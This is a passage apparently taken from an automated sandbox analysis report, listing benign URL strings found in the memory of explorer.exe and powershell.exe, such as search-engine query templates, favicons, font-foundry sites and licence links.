            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383246627.0000000006FE0000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
            Source: explorer.exe, 0000001D.00000000.383246627.0000000006FE0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.jp/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.uk/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.de/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.aol.com/favicon.ico
            Source: powershell.exe, 00000013.00000003.315483895.0000022F86026000.00000004.00000001.sdmp, explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 00000013.00000003.315876431.0000022F863B7000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.ask.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.docUrl.com/bar.htm
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.gismeteo.ru/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.in/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.jp/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.uk/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.br/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.sa/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.tw/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.cz/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.de/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.es/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.fr/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.it/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.pl/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.ru/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.si/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.iask.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.iask.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.linternaute.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.maktoob.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.mtv.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.mtv.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.najdi.si/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.najdi.si/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.nate.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.neckermann.de/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.neckermann.de/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.news.com.au/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.nifty.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.orange.fr/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
            Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
            Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
